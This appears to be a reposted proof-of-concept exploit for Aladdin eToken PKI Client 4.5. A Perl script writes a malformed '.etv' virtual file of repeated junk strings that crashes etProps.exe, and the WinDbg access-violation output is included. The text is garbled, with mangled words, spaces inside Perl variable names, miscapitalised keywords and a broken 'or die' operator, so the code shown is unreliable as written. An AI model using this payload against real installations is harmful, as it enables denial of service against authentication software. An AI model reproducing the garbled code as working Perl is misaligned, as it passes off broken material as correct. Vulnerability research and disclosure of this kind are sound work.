Test method:
The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! #! /Usr/bin/perl-w
#
# Title: Aladdin eToken PKI Client v4.5 Virtual File Handling Unspecified Memory authentication uption PoC
#
#
#
# Summary: The eToken PKI Client is the software that enables eToken USB operation and
# Implementation of eToken PKI-based solutions. These solutions include certificate-based
# Strong two-factor authentication, encryption and digital signing. With the PKI Client your
# PKI solutions become highly secure, extremely convenient and portable, as you can easily and
# Securely generate and store PKI keys on-board eToken smart card-based devices.
#
# Vendor: Aladdin Knowledge Systems Ltd.
# Product web page: http://www.aladdin.com
#
# Version tested: 4.5.52
# Tested on Microsoft Windows XP Professional SP3 (EN)
#
#
#
#===================================================== ========================================================== ====
#
# (154c. a74): Access violation-code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# Eax = 00000000 ebx = 00000000 ecx = 00000000 edx = 01730002 esi = 00000000 edi = 0012fc90
# Eip = 0045d3d3 esp = 001282b0 ebp = 00128304 iopl = 0 nv up ei pl nz na po nc
# Cs = 001b ss = 0023 ds = 0023 es = 0023 fs = 003b gs = 0000 efl = 00010202
# *** ERROR: Module load completed but symbols cocould not be loaded for etProps.exe
# EtProps + 0x5d3d3:
#0045d3d3 8b8ea4000000 mov ecx, dword ptr [esi + 0A4h] ds: 0023: 000000a4 == ????????
#
#===================================================== ========================================================== ====
#
#
#
# Vulnerability discovered by Gjoko LiquidWorm Krstic
#
# Zero Science Lab http://www.zeroscience.mk
#
# Liquidworm gmail com
#
#11.04.2010
#
# Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4933.php
#
$ Fajl = "Aladdin. etv"; # eToken Virtual file
$ Djubre = "batch ".
"Success ".
"Success ".
"Success ".
"Success ";
Open etv, ">./$ fajl" | die "Cant open $ fajl: $! ";
Print etv $ djubre x 100;
Print "[o] Writing to file ...";
Sleep 1;
Close etv;
Print "[o] File $ fajl created .";//